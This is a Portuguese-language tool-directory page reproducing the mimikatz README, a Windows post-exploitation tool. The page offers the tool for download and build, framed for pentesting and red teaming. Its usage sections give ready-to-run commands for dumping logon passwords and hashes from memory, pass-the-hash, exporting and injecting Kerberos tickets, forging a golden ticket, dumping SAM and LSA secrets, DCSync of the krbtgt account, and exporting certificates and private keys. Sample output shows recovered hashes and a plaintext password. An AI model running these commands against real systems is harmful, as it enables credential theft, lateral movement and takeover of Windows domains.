Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mimikatz — Uma pequena ferramenta para brincar com a segurança do Windows | Kitploit
Ferramentas/GitHubGitHub/gentilkiwi/mimikatz
Quebra de SenhasFrameworks de Testes de PenetraçãoFrameworks de ExploraçãoAtaques de SenhaMecanismos de PersistênciaExploraçãoAnálise de HashMovimento LateralPós-ExploraçãoTestes de PenetraçãoAutenticaçãoRed Teaming
21.8k4.2k57há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Desenvolvimento de Payloads
Top em Exploração nº12
Top em Frameworks de Exploração nº15
Top em Análise de Hash nº20
Top em Movimento Lateral nº20
Top em Ataques de Senha nº9
Top em Quebra de Senhas nº9
Top em Frameworks de Testes de Penetração nº15
Top em Mecanismos de Persistência nº11
Top em Pós-Exploração nº3
Top em Red Teaming nº10
GitHubgentilkiwi/mimikatz

mimikatz

Uma pequena ferramenta para brincar com a segurança do Windows

Ver RepositórioSite

mimikatz

mimikatz é uma ferramenta que fiz para aprender C e fazer alguns experimentos com segurança do Windows.

Agora é bem conhecido para extrair senhas em texto plano, hash, código PIN e tickets kerberos da memória. mimikatz também pode realizar pass-the-hash, pass-the-ticket ou construir Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Mas isso não é tudo! Crypto, Terminal Server, Events, ... muitas informações no GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki ou em https://blog.gentilkiwi.com (em francês, sim).

Se você não quiser compilar, os binários estão disponíveis em https://github.com/gentilkiwi/mimikatz/releases

Uso rápido

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilação

mimikatz está na forma de uma Solução Visual Studio e um driver WinDDK (opcional para operações principais), então os pré-requisitos são:

  • para mimikatz e mimilib : Visual Studio 2010, 2012 ou 2013 para Desktop (2013 Express para Desktop é gratuito e suporta x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • para mimikatz driver, mimilove (e plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz usa SVN para controle de versão, mas agora também está disponível com GIT! Você pode usar qualquer ferramenta que quiser para sincronizar, até mesmo o GIT incorporado no Visual Studio 2013 =)

Sincronizar!

  • GIT URL é : https://github.com/gentilkiwi/mimikatz.git
  • SVN URL é : https://github.com/gentilkiwi/mimikatz/trunk
  • Arquivo ZIP é : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Compilar a solução

  • Após abrir a solução, Build / Build Solution (você pode alterar a arquitetura)
  • mimikatz agora está compilado e pronto para ser usado! (Win32 / x64 até ARM64 se você tiver sorte)
    • você pode ter o erro MSB3073 sobre _build_.cmd e mimidrv, isso ocorre porque o driver não pode ser compilado sem o Windows Driver Kit 7.1 (WinDDK), mas mimikatz e mimilib estão OK.

ddk2003

Com esta plataforma MSBuild opcional, você pode usar as ferramentas de compilação WinDDK e o runtime padrão msvcrt (binários menores, sem dependências)

Para esta plataforma opcional, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 e Visual Studio 2010 são obrigatórios, mesmo se você planeja usar Visual Studio 2012 ou 2013 depois.

Siga as instruções:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Integração Contínua

O projeto mimikatz está disponível no AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Seu status é: AppVeyor CI status

Licença

Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz precisa de café para ser desenvolvido:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, você pode me contatar no Twitter ( @gentilkiwi ) ou por e-mail ( benjamin [at] gentilkiwi.com )
  • As funções DCSync e DCShadow no módulo lsadump foram co-escritas com Vincent LE TOUX, você pode contatá-lo por e-mail ( vincent.letoux [at] gmail.com ) ou visitar seu site ( http://www.mysmartlogon.com )

Este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!

Baixar ferramenta